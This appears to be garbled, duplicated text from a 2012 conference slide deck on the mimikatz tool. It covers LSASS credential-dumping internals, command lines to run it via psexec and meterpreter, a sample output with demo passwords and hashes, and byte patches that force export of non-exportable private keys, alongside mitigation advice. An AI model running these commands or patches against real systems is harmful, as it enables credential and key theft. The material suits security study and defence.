07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
